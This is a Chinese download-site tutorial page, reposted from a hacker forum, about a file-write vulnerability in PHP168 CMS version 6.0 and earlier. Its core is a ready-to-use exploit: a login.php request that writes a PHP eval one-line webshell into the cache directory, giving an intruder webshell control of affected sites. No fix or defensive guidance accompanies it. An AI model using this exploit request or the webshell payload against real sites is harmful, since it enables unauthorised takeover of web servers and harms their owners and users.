软件下载 | 资讯教程 | 最近更新 | 下载排行 | 一键转帖 | 发布投稿
您的位置:最火下载站 > 建站程序 > CMS教程 > PHP168 整站系统6.0及以下版本漏洞

PHP168 整站系统6.0及以下版本漏洞

  烈火网(LieHuo.Net)教程 最近在研究PHP,那个劲啊,就甭提鸟,本文引自黑客动画吧。

以下为引用的内容:
危险等级:高
影响版本:PHP168 6.0以下版本
入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。
出问题的文件
login.php
login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=<?php%20@eval($_POST[a]);?>
写到:cache/shell.php

    相关阅读
    网友评论
    栏目导航
    推荐软件